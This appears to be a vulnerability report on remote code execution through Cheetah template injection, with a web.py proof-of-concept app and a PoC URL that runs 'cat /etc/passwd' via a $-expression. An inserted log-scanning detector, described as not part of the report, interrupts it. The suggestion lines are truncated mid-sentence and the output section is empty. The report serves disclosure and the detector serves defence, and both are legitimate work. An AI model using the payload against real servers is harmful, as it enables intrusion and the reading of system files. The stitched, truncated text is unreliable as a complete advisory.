🔐 Critical RCE vulnerability: Cheetah Template executes arbitrary code from untrusted input
Summary
Cheetah templates allow execution of arbitrary Python code when rendering templates containing user-supplied input. This behavior can lead to Remote Code Execution (RCE) if developers render untrusted input directly. Specifically, the $ syntax supports evaluating Python expressions, which creates a critical security issue when template content is controlled by external users.
Proof of Concept
```python
# encoding: utf-8
# File: code.py
import web
from Cheetah.Template import Template

urls = (
    '/inject/(.*)', 'InjectDemo',
)
app = web.application(urls, globals())


class InjectDemo:
    def GET(self, user_input):
        try:
            # The untrusted path segment becomes the template SOURCE, so any
            # $-expression it contains is evaluated as Python during rendering.
            t = Template(user_input)
            return str(t)
        except Exception as e:
            return f"<b>Error:</b> {e}"


if __name__ == "__main__":
    app.run()
```
PoC: http://127.0.0.1:8080/inject/$__import__('os').popen(%22cat%20/etc/passwd%22).read()
output:
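As an added example (not part of this report or of the Cheetah project), the following detector percent-decodes request paths from access-log lines and flags Cheetah placeholder or directive syntax, rating dunder access inside a placeholder as high, which is the shape of the PoC above. The common-log-format layout, the directive list and the sample lines are assumptions and constructions of mine.

```python
import re
from urllib.parse import unquote

# Cheetah placeholders ($name, ${...}, $(...), $[...]) and common directives.
# Template syntax plus dunder access rates "high"; template syntax alone, "medium".
PLACEHOLDER_RE = re.compile(r"\$(?:[A-Za-z_]\w*|\{[^}]*\}|\([^)]*\)|\[[^\]]*\])")
DIRECTIVE_RE = re.compile(r"#(?:import|from|set|echo|def|include)\b")
DUNDER_RE = re.compile(r"__\w+__")
REQUEST_RE = re.compile(r'"[A-Z]+ (?P<path>\S+) HTTP/[\d.]+"')  # assumed log layout

def fully_decode(value, max_rounds=5):
    """Percent-decode until stable so %2524 (a double-encoded '$') is still caught."""
    for _ in range(max_rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value

def classify(raw_value):
    """Return 'high', 'medium' or 'none' for one request path or parameter value."""
    value = fully_decode(raw_value)
    has_syntax = PLACEHOLDER_RE.search(value) or DIRECTIVE_RE.search(value)
    if has_syntax and DUNDER_RE.search(value):
        return "high"
    if has_syntax:
        return "medium"
    return "none"

def scan_access_log(lines):
    """Return a list of (severity, decoded_path) for requests carrying template syntax."""
    findings = []
    for line in lines:
        match = REQUEST_RE.search(line)
        if not match:
            continue  # not a request line in the assumed format
        severity = classify(match.group("path"))
        if severity != "none":
            findings.append((severity, fully_decode(match.group("path"))))
    return findings

# Constructed sample lines (not taken from the report); the first mirrors the PoC shape.
SAMPLE_LOG = [
    '10.0.0.5 - - [01/Jan/2024:10:00:01 +0000] "GET /inject/%24__import__%28%27os%27%29 HTTP/1.1" 200 64',
    '10.0.0.6 - - [01/Jan/2024:10:00:02 +0000] "GET /inject/hello%20world HTTP/1.1" 200 11',
    '10.0.0.7 - - [01/Jan/2024:10:00:03 +0000] "GET /inject/%2524%7Bname%7D HTTP/1.1" 200 4',
    '10.0.0.8 - - [01/Jan/2024:10:00:04 +0000] "GET /inject/%23import%20os HTTP/1.1" 200 0',
    '10.0.0.9 - - [01/Jan/2024:10:00:05 +0000] "GET /price/$100 HTTP/1.1" 200 5',
]
```

A literal `$` followed by a digit (the `/price/$100` line) is not flagged, and the double-encoded `%2524%7Bname%7D` is still recognised as `${name}`.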
Suggestion:
Provide a safe mode or sandboxed re in Cheetah
Warn explicitly in the documentation that Cheetah.
Affected Version
Confirmed on latest release: Cheetah <=3.4.0